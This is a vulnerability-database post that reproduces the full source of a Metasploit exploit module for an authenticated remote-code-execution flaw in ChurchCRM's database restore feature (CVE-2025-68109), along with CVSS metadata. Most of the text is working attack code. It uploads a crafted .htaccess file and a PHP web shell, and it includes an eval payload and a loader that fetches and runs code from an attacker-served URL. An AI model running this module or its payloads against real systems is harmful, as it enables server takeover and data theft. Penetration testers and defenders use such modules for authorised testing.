{“lastseen”:”2026-04-16T19:28:02″,”description”:”This module exploits a Remote Code Execution RCE vulnerability in ChurchCRM versions prior to 6.2.0. The vulnerability resides in the Database Restore functionality, which allows an authenticated user with administrative privileges to upload a…”,”published”:”2026-04-16T19:02:12″,”modified”:”2026-04-16T19:02:12″,”type”:”metasploit”,”title”:”ChurchCRM Database Restore RCE 6.2.0″,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-68109″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = NormalRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n include Msf::Exploit::Remote::HttpServer\\n include Msf::Exploit::FileDropper\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘ChurchCRM Database Restore RCE 6.2.0’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a Remote Code Execution (RCE) vulnerability in ChurchCRM\\n versions prior to 6.2.0. The vulnerability resides in the Database Restore\\n functionality, which allows an authenticated user with administrative privileges\\n to upload a malicious backup file. By bypassing upload restrictions via a\\n crafted .htaccess file, the module enables PHP code execution in the target\\n directory, ultimately providing the attacker with a Meterpreter shell.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [‘LucasCsmt’],\\n ‘References’ =\\u003e [\\n [ ‘GHSA’, ‘pqm7-g8px-9r77’],\\n [ ‘CVE’, ‘2025-68109’]\\n ],\\n ‘Platform’ =\\u003e [‘linux’, ‘php’],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Linux\/unix Command (CmdStager)’,\\n {\\n ‘Arch’ =\\u003e [ ARCH_X86, ARCH_X64 ],\\n ‘Platform’ =\\u003e [‘linux’],\\n ‘Type’ =\\u003e :nix_cmdstager,\\n ‘CmdStagerFlavor’ =\\u003e [\\n ‘printf’, ‘echo’, ‘bourne’, ‘fetch’, ‘curl’, ‘wget’\\n ]\\n }\\n ],\\n [\\n ‘PHP (In-Memory)’,\\n {\\n ‘Arch’ =\\u003e [ ARCH_PHP ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Type’ =\\u003e :php_memory\\n }\\n ],\\n [\\n ‘PHP (Fetch)’,\\n {\\n ‘Arch’ =\\u003e [ ARCH_PHP ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Type’ =\\u003e :php_fetch\\n }\\n ],\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-12-17’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, CONFIG_CHANGES]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘Username for the admin account’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, ‘Password for the admin account’, nil])\\n ]\\n )\\n end\\n\\n # Check if the target is up by accessing the login page\\n def check\\n vprint_status(‘Checking if the target is reachable…’)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘session’, ‘begin’)\\n })\\n\\n unless [200, 301, 302].include?(res.code)\\n return Exploit::CheckCode::Unknown(\\”Unexpected HTTP response code: #{res.code}\\”)\\n end\\n\\n version = res.headers[‘CRM-VERSION’]\\n if version\\n print_status(\\”Found ChurchCRM version: #{version}\\”)\\n if Rex::Version.new(version) \\u003c Rex::Version.new(‘6.5.3’)\\n return Exploit::CheckCode::Appears(\\”Vulnerable version #{version} detected via CRM-VERSION header.\\”)\\n else\\n return Exploit::CheckCode::Safe(\\”Version #{version} is not vulnerable.\\”)\\n end\\n end\\n if res.body.include?(‘ChurchCRM’)\\n return Exploit::CheckCode::Detected(‘ChurchCRM detected, but the version could not be determined.’)\\n end\\n\\n Exploit::CheckCode::Safe(‘The target does not appear to be ChurchCRM.’)\\n end\\n\\n # Build the payload that will be into the installation form\\n #\\n # @return : the payload\\n def build_payload\\n case target[‘Type’]\\n when :php_memory\\n b64_payload = Rex::Text.encode_base64(payload.encoded)\\n \\”\\u003c?php eval(base64_decode(\\\\\\”#{b64_payload}\\\\\\”)); ?\\u003e\\”\\n when :php_fetch\\n payload_name = ‘\/tmp\/’ + rand_text_alpha(5..10) + ‘.php’\\n \\”\\u003c?php $f=’#{payload_name}’; file_put_contents($f, file_get_contents(‘#{get_uri}’)); register_shutdown_function(‘unlink’, $f); include($f); ?\\u003e\\”\\n else\\n \\”\\u003c?php if(isset($_GET[‘cmd’])){system($_GET[‘cmd’].’ 2\\u003e\\u00261′);} ?\\u003e\\”\\n end\\n end\\n\\n # Get the session cookie of the specified user\\n #\\n # @return : the session cookie\\n def get_cookie\\n print_status ‘Getting the session cookie’\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘session’, ‘begin’),\\n ‘vars_post’ =\\u003e {\\n ‘User’ =\\u003e datastore[‘USERNAME’],\\n ‘Password’ =\\u003e datastore[‘PASSWORD’]\\n }\\n })\\n\\n fail_with(Failure::Unreachable, ‘No answer from the server’) unless res\\n fail_with(Failure::NoAccess, ‘Authentication error : Invalid login or password’) if res.body.include?(‘Invalid login or password’)\\n fail_with(Failure::NoAccess, ‘Authentication error : This account have been locked’) if res.body.include?(‘Too many failed logins’)\\n fail_with(Failure::UnexpectedReply, \\”Invalid status code : #{res.code}\\”) unless [200, 301, 302].include?(res.code)\\n\\n cookie = res.get_cookies\\n fail_with(Failure::UnexpectedReply, ‘No cookies found’) if cookie.blank?\\n\\n print_good ‘The session cookie has been received’\\n cookie\\n end\\n\\n # Handles the incoming HTTP request and serves the payload to the target.\\n def on_request_uri(cli, _request)\\n p = payload.encoded\\n send_response(cli, p, {\\n ‘Content-Type’ =\\u003e ‘application\/x-httpd-php’,\\n ‘Pragma’ =\\u003e ‘no-cache’\\n })\\n end\\n\\n def execute_command(cmd, _opts = {})\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘tmp_attach’, ‘ChurchCRMBackups’, @payload_name),\\n ‘vars_get’ =\\u003e { ‘cmd’ =\\u003e cmd }\\n })\\n end\\n\\n # Upload a file exploiting the database resotre functionality\\n #\\n # @param : file_name, the name of the file to upload\\n # @param : content, the content of the file to upload\\n def upload_file(file_name, content)\\n print_status \\”Uploading the file : #{file_name}\\”\\n data = Rex::MIME::Message.new\\n data.add_part(\\n content,\\n ‘application\/octet-stream’,\\n nil,\\n \\”form-data; name=\\\\\\”restoreFile\\\\\\”; filename=\\\\\\”#{file_name}\\\\\\”\\”\\n )\\n data.add_part(”, nil, nil, ‘form-data; name=\\”restorePassword\\”‘)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘database’, ‘restore’),\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{data.bound}\\”,\\n ‘data’ =\\u003e data.to_s,\\n ‘cookie’ =\\u003e @cookie\\n })\\n fail_with(Failure::Unreachable, ‘No answer from the server’) unless res\\n # The server returns a 500 error because the uploaded file is not a valid backup file, but the file is still uploaded before the crash.\\n fail_with(Failure::NotVulnerable, ‘Invalid status code, the target may not be vulnerable’) unless res.code == 500\\n print_good ‘The file have been uploaded successfully’\\n end\\n\\n # Execute the payload\\n def execute_payload\\n print_status ‘Trying to execute the payload’\\n if target[‘Type’] == :nix_cmdstager\\n execute_cmdstager(\\n linemax: 500,\\n nodelete: false,\\n background: true,\\n temp: ‘\/tmp’\\n )\\n else\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘tmp_attach’, ‘ChurchCRMBackups’, @payload_name)\\n })\\n end\\n print_good ‘Payload successfully executed’\\n end\\n\\n def exploit\\n if target[‘Type’] == :php_fetch\\n print_status(‘Starting HTTP server to serve the payload…’)\\n start_service\\n end\\n\\n @cookie = get_cookie\\n\\n upload_file ‘.htaccess’, \\”Allow from all\\\\n\\”\\n register_file_for_cleanup(‘.htaccess’)\\n\\n @payload_name = rand_text_alpha(5..10) + ‘.php’\\n upload_file @payload_name, build_payload\\n register_file_for_cleanup(@payload_name)\\n\\n execute_payload\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/churchcrm_db_restore_rce.rb”,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/churchcrm_db_restore_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-16T19:28:02″,”description”:”This module exploits a Remote Code Execution RCE vulnerability in ChurchCRM versions prior to 6.2.0. The vulnerability resides in the Database Restore functionality, which allows…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,169,13,7,11,5],"class_list":["post-47503","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n